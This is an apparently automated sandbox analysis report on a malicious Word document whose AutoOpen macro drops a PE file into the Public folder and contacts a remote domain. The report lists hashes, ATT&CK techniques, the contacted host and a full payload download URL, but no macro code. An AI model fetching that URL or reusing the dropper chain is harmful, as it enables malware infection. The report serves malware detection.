Analysis Report documenti 12.01.20.doc
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: BlueMashroom DLL Load |
Source: | Author: Florian Roth |
Sigma detected: Regsvr32 Anomaly |
Source: | Author: Florian Roth |
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | Virustotal: |
Machine Learning detection for sample |
Source: | Joe Sandbox ML: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office process drops PE file |
Source: | File created: |
Source: | OLE, VBA macro line: |
Source: | OLE, VBA macro: | Name: AutoOpen |
Source: | OLE, VBA macro line: |
Source: | OLE indicator, VBA macros: |
Source: | OLE indicator has summary info: |
Source: | OLE indicator application name: |
Source: | Dropped File: |
Source: | Key opened: |
Source: | Section loaded: |
Source: | Classification label: |
Source: | File created: |
Source: | File created: |
Source: | OLE document summary: |
Source: | OLE document summary: |
Source: | OLE document summary: |
Source: | Command line argument: | 1_2_00B31460 |
Source: | Command line argument: | 1_2_00B31460 |
Source: | Command line argument: | 1_2_00B31460 |
Source: | WMI Queries: |
Source: | File read: |
Source: | Key opened: |
Source: | File read: |
Source: | File read: |
Source: | Virustotal: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Key value queried: |
Source: | Key opened: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Binary string: |
Source: | Code function: | 1_2_00B31460 |
Source: | Code function: | 1_2_00B320A4 |
Persistence and Installation Behavior: |
---|
Creates processes via WMI |
Source: | WMI Queries: |
Drops PE files with a suspicious file extension |
Source: | File created: |
Source: | File created: |
Source: | File created: |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: |
Source: | Process information set: |
Source: | Memory allocated: |
Source: | File opened / queried: |
Source: | Binary or memory string: |
Source: | Binary or memory string: |
Source: | Binary or memory string: |
Source: | Binary or memory string: |
Source: | Binary or memory string: |
Source: | Code function: | 1_2_00B31460 |
Source: | Code function: | 1_2_00B31F11 |
Source: | Process created: |
Source: | Code function: | 1_2_00B31DC3 |
Source: | Code function: | 1_2_00B31460 |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation11 | DLL Side-Loading1 | Process Injection11 | Masquerading211 | OS Credential Dumping | System Time Discovery1 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Command and Scripting Interpreter2 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Virtualization/Sandbox Evasion2 | LSASS Memory | Security Software Discovery11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Scripting2 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Virtualization/Sandbox Evasion2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | Native API1 | Logon Script (Mac) | Logon Script (Mac) | Scripting2 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Exploitation for Client Execution13 | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Information Discovery6 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
documenti 12.01.20.doc | 29% | Virustotal | | |
documenti 12.01.20.doc | 100% | Joe Sandbox ML | | |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 0% | Metadefender | | |
| | 0% | ReversingLabs | | |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
nfj254aim.com | 104.28.6.227 | true | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| | false | | unknown |
URLs from Memory and Binaries |
---|
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
104.28.6.227 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 326338 |
Start date: | 03.12.2020 |
Start time: | 10:11:18 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 51s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documenti 12.01.20.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of new started processes analysed: | 23 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal88.expl.winDOC@4/13@1/1 |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | | | malicious | | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\Public\ms.com | | | malicious | | |
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 13312 |
Entropy (8bit): | 4.926696656173964 |
Encrypted: | false |
SSDEEP: | 192:ohs5YZgW7BXxaQbmpi/Dago+Mz8FDe2WwqrIRbW3oo:9kBXxfmpimR78E2WwqIWYo |
MD5: | 7083239CE743FDB68DFC933B7308E80A |
SHA1: | 274216860964AF5ACDCE5F7BD508F69C98FA55B2 |
SHA-256: | CBAB3546BDDB2E4EA340C1A7DF680DA6C4F4F2F18B8E98F6D4B66926183E269E |
SHA-512: | 8047FCAB5D3A35A405661C72879D6EBCF3EF2AFE7486649F0BBC43FA59E898A9E37A998940764422E1AB0AE066B3E45132D67CAB963B9BF3C44BC3EC8D4EDC6D |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 17904 |
Entropy (8bit): | 5.221943493256307 |
Encrypted: | false |
SSDEEP: | 192:eBZQiLCb1hint4zdt1e870k0hs70k0C2qNXl6qJExTxvYj0lXUZIeYsa3UKh73uy:e3QYnadWs4TxYI2ZHeM7MQc |
MD5: | 7F908F1EE0BBB0B276589F06368A008D |
SHA1: | EE9D0FA4C45AEB9C75750AA003E7C0F0F22E348D |
SHA-256: | 8B23A9189FD2FE4CC89459224ED36E7A64121DE9589D3AC9CEAE9E4DEEF7F23A |
SHA-512: | 3FBEBBCD1B5F2A731470037A702BA58EEFBC0764874D465539E90B6FCD4BA16E93221E8EB402BF2D3B603A6B4D81E3B1A2E68EA3625A93716F4EF991FA625633 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 130058 |
Entropy (8bit): | 5.378006827606677 |
Encrypted: | false |
SSDEEP: | 1536:6cQceNWrA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:hmQ9DQW+zBX8u |
MD5: | F28073F5D9517A703D6F836C06E3BD72 |
SHA1: | F3D940A80A311EFCD0E05027AEC396B477CD3390 |
SHA-256: | 2BF2B6CB402BBEB2DF6D7C17F4F26FADFF892B82B46848B2A1D07815FFAFC3CF |
SHA-512: | 093D18E703EB29CC96B81E62CF1C242FB9DDEEFE2011A1853F08A1B25B2BB9C2E9E857BE754DE016C0507A14C904AAC9B8C0952F43C160BD45643BA1769FC5A3 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 57258 |
Entropy (8bit): | 7.900983242117529 |
Encrypted: | false |
SSDEEP: | 768:Nne7FOQKYij8iCi2EQrb4lF6j5UTFRHehGLOAFed/6CO2wPbttab/jz7Q+6fNsaw:Ne7Il+Oy4wUOAL2wPbnQ/Tz6CaCd |
MD5: | B44AC26E80A557B913B715F234C3D769 |
SHA1: | 1E0574649A9E5BBE0283D83A801E0E3EC4261BBC |
SHA-256: | 1EFAC6DE241D24814D7925C803E3ACBF4E2CD4A90FDE9C6826613DE2A8063B7B |
SHA-512: | 4349E729AEDC4E69A92432553C0BEA8CF5D4D92E7908F25DB5DF3E1B3628F74D362AFD15AED5EED12E53ABDFFAB44F81E39006C8C6FF4D242A05D45AFFA08E5D |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:X:X |
MD5: | 32649384730B2D61C9E79D46DE589115 |
SHA1: | 053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4 |
SHA-256: | E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB |
SHA-512: | A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C |
Malicious: | false |
Reputation: | high, very likely benign file |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 0.3796147056131488 |
Encrypted: | false |
SSDEEP: | 3:9l3lli4wltfSP8lFllItEMAWuWy:kFSP8gtEMAWpy |
MD5: | 39F0255F9BB41BD49E765898D326FB77 |
SHA1: | 8AD67EEB7CF2ED4CA7DD1AF586406DE92113C6F1 |
SHA-256: | 7DB4A7FAFE19900A941F5EC134454C4769D6D1F8227A176A3CEBD9F3C7D86056 |
SHA-512: | 6FD2E6037C25B4EC5D091B9E2C3F2E9EC04FC3A59AFD79D980ED0E11FFEEFBA18EA535B1C0443A01BC50C5AED4C4F1150B0487B89CE35B2B440D323B40592B28 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Reputation: | high, very likely benign file |
Process: | C:\Users\Public\ms.com |
Category: | downloaded |
Size (bytes): | 205 |
Entropy (8bit): | 5.155240244937957 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T |
MD5: | 6C598B85477C948D2A6C50AB26631415 |
SHA1: | 429CE2C54B01450B0250D423F08886A0F6B567DB |
SHA-256: | 04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4 |
SHA-512: | 9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA |
Malicious: | false |
Reputation: | low |
IE Cache URL: | http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz |
Process: | C:\Users\Public\ms.com |
File Type: | |
Category: | dropped |
Size (bytes): | 205 |
Entropy (8bit): | 5.155240244937957 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T |
MD5: | 6C598B85477C948D2A6C50AB26631415 |
SHA1: | 429CE2C54B01450B0250D423F08886A0F6B567DB |
SHA-256: | 04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4 |
SHA-512: | 9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA |
Malicious: | true |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2190 |
Entropy (8bit): | 4.712055572834122 |
Encrypted: | false |
SSDEEP: | 24:8xJvKgz97TLn0AWHlHD+C3S7aB6myxJvKgz97TLn0AWHlHD+C3S7aB6m:8vvKarDWHgC3DB6pvvKarDWHgC3DB6 |
MD5: | 4E46CCE2B28C2C8F37445649C41C3D13 |
SHA1: | 53466F4075B1C2DA347CAC97D9DF3328475AE4AA |
SHA-256: | 51E4ACCBF645FBA5364F0778E421EB5860A68FC62E0445581E8A622806CCBC7D |
SHA-512: | CD886689C52BC3F75ADAE18F4005735E8B3F06C265D862378BDAB418ED36ADE3FA1859DCAD9C26938B52AB170CC4D9B5370135630EE6864A26DF7E20F188E9C8 |
Malicious: | true |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 104 |
Entropy (8bit): | 4.257252520997243 |
Encrypted: | false |
SSDEEP: | 3:M18H9LRBa9CZELRBa9CmX18H9LRBa9Cv:M+H9LCgELC2H9LCs |
MD5: | E4D38C0BB0C8C137A27C95905AF5428E |
SHA1: | 8D6D1A7BD1F255BE9B0F781D48887D9FFAC1BE48 |
SHA-256: | 461FC19670225BA840A06E93B71E3170F24C1B0C0362756ADABA3389BD5D31C5 |
SHA-512: | 89E37B3E835960A39E17FFEF53755EFB4309DE3F8F93FBF8A1381A2E1DCC27AB8AAF7F5C902177EBEBFFBB95A0B7D3679DD3853975331DDA6B1D49F36A1C692B |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.270627014481718 |
Encrypted: | false |
SSDEEP: | 3:Rl/ZdXmxoYlqKKhlLlFlqKO83X/tln:RtZVmxQ5QO |
MD5: | 91C0013827A6C6DC8AAAE35D0CD89DC6 |
SHA1: | 118F5DE34C62F8B7A3117BD1BDCCC30DDA804688 |
SHA-256: | EAE73803990EB17F35470ED74A38A013986DF7D071BF65FECC8E002616A1EFB8 |
SHA-512: | 40A7A76D64B90F0FBFFA5F4C7F84031FF8CD2AE102760E54A6837909D34A6C076EC34E8E06C255590CBF7F5F6E1F1E2A40F2496BB034E5B779EBDAF9462E2113 |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.270627014481718 |
Encrypted: | false |
SSDEEP: | 3:Rl/ZdXmxoYlqKKhlLlFlqKO83X/tln:RtZVmxQ5QO |
MD5: | 91C0013827A6C6DC8AAAE35D0CD89DC6 |
SHA1: | 118F5DE34C62F8B7A3117BD1BDCCC30DDA804688 |
SHA-256: | EAE73803990EB17F35470ED74A38A013986DF7D071BF65FECC8E002616A1EFB8 |
SHA-512: | 40A7A76D64B90F0FBFFA5F4C7F84031FF8CD2AE102760E54A6837909D34A6C076EC34E8E06C255590CBF7F5F6E1F1E2A40F2496BB034E5B779EBDAF9462E2113 |
Malicious: | false |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.894769517768764 |
TrID: |
|
File name: | documenti 12.01.20.doc |
File size: | 93665 |
MD5: | f530de77053a5c25a94f930bb954bcf8 |
SHA1: | 46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4 |
SHA256: | 1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82 |
SHA512: | f35b4d0cf4d0665117f58792a4d0fe51f13210921c1ac9d715160a4f9708e09817c6f0ab65e2c37c493a22d41fdacaaba1775fb8cc205b9d3e4855258892f916 |
SSDEEP: | 1536:A/rBcK6fNcSI7O8hRe7Il+Oy4wUOAL2wPbnQ/Tz6CaC/B2RrNbSxQml:w6lfNu/Q7Y9wkFncTZB2RrN9S |
File Content Preview: | PK..........!.[...............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74f4c4c6c1cac4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Template: | |
Total Edit Time: | 0 |
Number of Pages: | 1 |
Number of Words: | 0 |
Number of Characters: | 0 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Number of Lines: | 3 |
Number of Paragraphs: | 0 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0000 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 1127 |
---|
General | |
---|---|
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 1127 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Creatable |
VB_Name |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
"ThisDocument" |
VBA Code |
---|
|
VBA File Name: a7A5m.bas, Stream Size: 5178 |
---|
General | |
---|---|
Stream Path: | VBA/a7A5m |
VBA File Name: | a7A5m.bas |
Stream Size: | 5178 |
VBA Code Keywords |
---|
Keyword |
---|
joins |
effigy |
photo |
maidenhead |
torah |
imprint |
co-operative |
unfavorable |
Collects |
Public |
Diagram |
aSGxU |
Makeup |
father |
abhorred |
controls |
Cutting |
unpropitious |
minerva |
Training |
Adventures |
unveil |
Mysimon |
Replace(aPENSZ, |
slanderous |
webcast |
savoury |
nucleus |
liberia |
footstool |
Adroit |
nutmeg |
greenish |
inter |
adHaPl |
Hallow |
warner |
manger |
ethical |
Since |
pickled |
Routing |
Sniff |
Giants |
Nickel |
seventy-four |
fellowship |
shadow |
Maudlin |
stefan |
Tribal |
tabooed |
akSqK(aPENSZ) |
expire |
along |
vaccine |
reaction |
Rancid |
patricia |
lackey |
coxcomb |
Workflow |
axIuO |
succeed |
daisy |
syria |
Receptacle |
Defraud |
Knowledge |
Contacts |
Sorcery |
transit |
undersigned |
leniency |
sacrilegious |
aYKyQ |
dearborn |
insulation |
detecting |
cloud |
Glucose |
willy |
wealth |
probity |
exhort |
Accelerated |
ballast |
Articulated |
transverse |
azUoN |
Outcome |
Specifies |
graphic |
brandishing |
Attribute |
gamespot |
rectangular |
patients |
awAlq() |
tumults |
Enemies |
Basketball |
VB_Name |
Gloating |
(axSiN) |
Issue |
counterfeit |
Function |
Retrospect |
unadulterated |
comfort |
hybrid |
Munich |
brandon |
delay |
located |
actors |
commentary |
akSqK |
cubic |
stacy |
photographers |
Airport |
characters |
dappled |
chris |
mangrove |
knack |
Generates |
statute |
Attorney |
coupling |
navel |
Pyramid |
steady |
bakery |
Boolean |
Terrace |
Verzeichnis |
turnpike |
VBA Code |
---|
|
VBA File Name: aH8xms.bas, Stream Size: 863 |
---|
General | |
---|---|
Stream Path: | VBA/aH8xms |
VBA File Name: | aH8xms.bas |
Stream Size: | 863 |
VBA Code Keywords |
---|
Keyword |
---|
awAlq |
Attribute |
AutoOpen() |
VB_Name |
VBA Code |
---|
|
VBA File Name: aIsb7.bas, Stream Size: 5040 |
---|
General | |
---|---|
Stream Path: | VBA/aIsb7 |
VBA File Name: | aIsb7.bas |
Stream Size: | 5040 |
VBA Code Keywords |
---|
Keyword |
---|
Blackmail |
developer |
valuation |
plume |
aMslO(aucpr) |
amZcqK |
Berkeley |
plenipotentiary |
translations |
aYzBn |
roundabout |
aVzRp() |
(akSqK(aucpr)) |
Pronoun |
aCqnt |
positions |
teams |
purveyor |
arthur |
louis |
soviet |
Tatiana |
axSiN |
motherboard |
numeric |
Idiom |
perspective |
dialectic |
shallows |
gazette |
Discovery |
felony |
unconvinced |
roller |
Proven |
medicare |
ElseIf |
clime |
cartwright |
importunate |
moiety |
guess |
Bulldog |
adeKx |
Bereavement |
asses |
participated |
Waylaid |
confiscate |
grandchildren |
Barely |
axSiN() |
Shutter |
Coiled |
realty |
compute |
Precedence |
vapid |
Attribute |
handcuffs |
aaqRT |
transparency |
specialized |
propaganda |
VB_Name |
calvin |
telephony |
everyday |
Function |
baste |
demesne |
switching |
Springer |
Modes |
Luggage |
Avant |
catalog |
Milky |
hearthstone |
tracy |
expand |
aMslO |
Johns |
sunset |
requires |
VBA Code |
---|
|
VBA File Name: aOMv0.bas, Stream Size: 3156 |
---|
General | |
---|---|
Stream Path: | VBA/aOMv0 |
VBA File Name: | aOMv0.bas |
Stream Size: | 3156 |
VBA Code Keywords |
---|
Keyword |
---|
causes |
anFJy |
exclusively |
Truly |
Browser |
aYzBn(aDKIk, |
smell |
Searched |
adBRr(anFJy) |
Surrounding |
recommendations |
nazarene |
Constitutes |
proteins |
delegation |
String |
aMnjk |
commentator |
zoological |
trunk |
Juvenile |
pearly |
ElseIf |
Insider |
learning |
Oreilly |
Asc(aMnjk) |
Treasurer |
alfred |
aDKIk |
Integer |
limousine |
Alexander |
Respiratory |
aJjwu) |
abomination |
delayed |
Memoirs |
Attribute |
ascendancy |
acclaim |
Imprecation |
VB_Name |
wampum |
Etymology |
undeceive |
Function |
priory |
humanities |
relatives |
sufficiency |
aJjwu |
unless |
persons |
(aDKIk |
elusive |
Stumped |
turnpike |
VBA Code |
---|
|
VBA File Name: aRZcbw.bas, Stream Size: 4810 |
---|
General | |
---|---|
Stream Path: | VBA/aRZcbw |
VBA File Name: | aRZcbw.bas |
Stream Size: | 4810 |
VBA Code Keywords |
---|
Keyword |
---|
uninterested |
determinate |
Const |
serenade |
fraser |
unreliable |
Public |
Contacting |
adolescence |
Kinswoman |
wickedly |
walnut |
blots |
undivided |
vociferous |
Antigua |
Librarian |
Indolence |
procedures |
encounter |
Campaign |
riven |
Defined |
belfast |
tradespeople |
dizziness |
Abstention |
Terrorist |
Maidenhead |
Anniversary |
phosphoric |
dialectic |
enemies |
Dentists |
String |
Upskirt |
Nearly |
undecided |
affordable |
timeline |
Obviously |
selective |
offset |
const |
restrictions |
would |
shove |
nomenclature |
axIuO() |
Gentle |
Choosing |
Maine |
gamma |
consulting |
strumpet |
schooling |
Metallic |
dietary |
stumble |
landscape |
Straightforward |
prove |
deuteronomy |
ravage |
Ecological |
brazilian |
Integer |
jerky |
adroitly |
walter |
daughter-in-law |
aVzRp |
shell |
supporters |
catering |
magnanimous |
Stylish |
haven |
assets |
boarding |
holland |
washington |
"aRZcbw" |
Attribute |
abortion |
economies |
compensation |
Receptor |
latch |
Dysentery |
Variety |
expanding |
VB_Name |
Esquire |
Fisting |
aYKyQ() |
collapse |
Function |
completeness |
cambodia |
branch |
elliptical |
Entrust |
reporting |
demanding |
consolidation |
sceptic |
priced |
Gamma |
Sensuality |
unload |
cover |
brooded |
strings |
VBA Code |
---|
|
VBA File Name: abh0Rg.bas, Stream Size: 4574 |
---|
General | |
---|---|
Stream Path: | VBA/abh0Rg |
VBA File Name: | abh0Rg.bas |
Stream Size: | 4574 |
VBA Code Keywords |
---|
Keyword |
---|
seasonal |
pointed |
Trains |
Cancelled |
theaters |
swain |
fullness |
Public |
sulky |
referring |
explain |
compost |
Aquarium |
bullet |
digit |
downpour |
Changelog |
alabaster |
denounce |
Candy |
self-evident |
Homesickness |
Machinist |
statistical |
Primacy |
FreeFile |
Love-making |
Truism |
companies |
mother-in-law |
Competition |
subway |
analytical |
walrus |
greenhouse |
Flaccid |
Webshots |
Tress |
tricolor |
pacific |
pretension |
radius |
Drawn |
FileNumber |
Breakdown |
diffidence |
Biology |
aicyF |
illusory |
wikipedia |
poison |
adBRr |
dutch |
suggesting |
participation |
Plaza |
Sanity |
Gaoler |
impromptu |
isthmus |
Amber |
sender |
urges |
changes |
#FileNumber |
confidentiality |
tunisia |
liqueur |
Simulated |
coding |
venues |
seashore |
reservation |
lighthouse |
swimmer |
Arising |
aicyF) |
lambent |
sloped |
shortening |
fahrenheit |
transcendent |
#FileNumber, |
flexible |
Winsome |
Georgia |
option |
Forests |
lazarus |
labourer |
bukkake |
Grenada |
Surplus |
Attribute |
avhZYf |
aVOhvn |
Syntax |
Close |
devious |
engineers |
cleaner |
VB_Name |
lichen |
Outwards |
stubbornly |
proceeds |
trusted |
Function |
belle |
depth |
highlighted |
FileCopy |
louisville |
Inconsistency |
ungracious |
opposite |
adBRr(avhZYf) |
disagree |
Indisputable |
Output |
classroom |
notch |
Abandons |
allegorical |
Overhung |
eddies |
Adultery |
Intact |
VBA Code |
---|
|
VBA File Name: adGbPA.bas, Stream Size: 4586 |
---|
General | |
---|---|
Stream Path: | VBA/adGbPA |
VBA File Name: | adGbPA.bas |
Stream Size: | 4586 |
VBA Code Keywords |
---|
Keyword |
---|
intervals |
octagonal |
neigh |
signs |
astrology |
legitimately |
tittle |
southwest |
Technique |
Matins |
rejoin |
Mephistopheles |
intimidation |
Burdensome |
Responsibility |
syllogism |
Adobe |
pounds |
patrick |
concave |
Bequeath |
Types |
hesse |
Select |
pragmatic |
excavation |
magnificent |
Vishnu |
abolitionist |
estimated |
occurrence |
Vassal |
adkJvD |
Armenia |
Sanctified |
dunbar |
Systematically |
component |
Departments |
modular |
lucrative |
Stating |
Attica |
derivation |
attending |
Bouquet |
losses |
leave-taking |
Screens |
fleshy |
primal |
Hybrid |
)o)l)l)e)h)"), |
Redden |
utility |
clustering |
Unless |
athens |
totality |
"adGbPA" |
inferno |
recurring |
expiring |
Sampson |
languidly |
Marrow |
trojan |
Attribute |
Counsellor |
Receipt |
headers |
Inactive |
Sundown |
lingo |
charlotte |
thirty-nine |
aGSfMv() |
VB_Name |
Terminal |
overran |
Wicked |
Function |
silhouette |
recovery |
Mario |
Infringement |
Ticket |
pichunter |
chemist |
Blue-black |
brainless |
cliff |
complacent |
compendium |
aGSfMv |
defilement |
annuity |
register |
foundry |
Displacement |
remonstrate |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 618 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 618 |
Entropy: | 5.34267626544 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 8 6 2 6 2 4 0 6 - 3 0 4 D - 4 E F A - A 4 4 C - C 5 5 4 C 4 7 8 6 1 3 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a H 8 x m s . . M o d u l e = a R Z c b w . . M o d u l e = a b h 0 R g . . M o d u l e = a 7 A 5 m . . M o d u l e = a d G b P A . . M o d u l e = a I s b 7 . . M o d u l e = a O M v 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 C |
